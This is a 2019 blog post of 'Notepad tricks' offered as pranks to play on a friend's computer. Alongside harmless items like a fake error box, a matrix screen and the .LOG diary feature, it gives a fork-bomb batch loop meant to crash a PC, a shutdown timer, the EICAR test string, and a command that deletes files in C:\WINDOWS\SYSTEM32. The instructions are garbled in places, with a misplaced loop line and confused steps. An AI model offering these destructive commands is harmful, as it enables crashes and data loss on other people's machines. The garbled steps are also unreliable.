banner image

Best Notepad Tricks and Commands


Best Notepad Tricks and Commands

Notepad is a text editing program of the Windows operating system that allows users to create simple text documents. This is a default program, which is available in the window of all versions. A programmer or a person who knows about programming code well can play with a computer function using Notepad Text Editor and a special code that is in his mind.

It has the power to build basic programs from viruses to insects. We have a list of some cool notepad codes that will help you do some fun work with your closest friend computer, which your friend has never seen before. Simply copy and paste the code below to see some magic tricks on your laptop / PC display.

1. Make Fake Windows Error with Notepad Tricks

With the help of the code given below, we can make fake weird windows errors, just paste the code below and save it with the .vbs extension.

  • Open Notepad, press the Windows + R key and enter Notepad hit enter
  • Type X=Msgbox(“Put your Message Here”,0+16, ”Put Title Here”) - Replace the error message.
  • Save the file with error

2. Display Matrix-like Hackers in Hollywood Movies

Change the matrix color by editing the color value (we can edit numbers 1 - 9 to check different color matrix)
  • Open Notepad, press the Windows + R key and enter Notepad hit.
@echo off
color 5
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%

  • goto start save file with matrix.bat

3. Set Shutdown Time Duration

Now set the date range of your computer according to the code. Change the code below to apply a different effect L to log or R to reboot.
  • Open Notepad, press the Windows + R key and enter Notepad hit.
  • shutdown.exe /s /t 1800(After running the batch file the computer will be automatically shut down in 30 minutes (1800 seconds)).
  • Save file from shutdown.bat

4. Create a log diary on Notepad

Log the timeline of Notepad Trick display date and edit attempts in a Notepad file. This means that when you write any text in Notepad, it automatically saves the date and time of edited text.
  • Open Notepad, press the Windows + R key and enter Notepad hit enter.
  • Type the.LOG in Notepad and save it as LogDiary with the default extension. Now open the saved file and type any text in your mind and press Ctrl + S to save the file.
  • Now close the file and open it again. This will automatically add to the time and date of the event.

5. Test your antivirus protection with Notepad code

Check now that your system is working properly on antivirus. Simply paste the code below into a notepad file and save it with .exeextension. If your system is working properly on antivirus, it will stop playing unauthorized publisher files on your computer.
  • Open Notepad, press the Windows + R key and enter Notepad hit.
  • X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
  • Simply copy and paste the code into Notepad file and save it with the Testantivirus.exe extension, now run the file to start the trial.

6. Your computer with the Notepad Code Temporary Crashes

Notepad code temporarily crashes your computer, you can fix the problem after shutdown.
  • Open Notepad, press the Windows + R key and enter Notepad hit enter.
 @echo off
   :crash
   start
  goto crash

  • Simply copy and paste the code into a notepad file and save it with the Crash.bat extension.

7. Delete Windows / System 32 with Notepad Code

The code has the power to remove the Windows System 32 directory, which contains important files that are necessary to run the system.
  • Open Notepad, press the Windows + R key and enter Notepad hit.
  • DEL C:\WINDOWS\SYSTEM32\*.*/Q
  • Simply copy and paste the code into Notepad file and save it with Delete32.bat extension.
Use these notepad tricks and codes at your own risk, we are not responsible for any system error after application.
Best Notepad Tricks and Commands Best Notepad Tricks and Commands Reviewed by Muneer Ahmed on February 06, 2019 Rating: 5

No comments:

Powered by Blogger.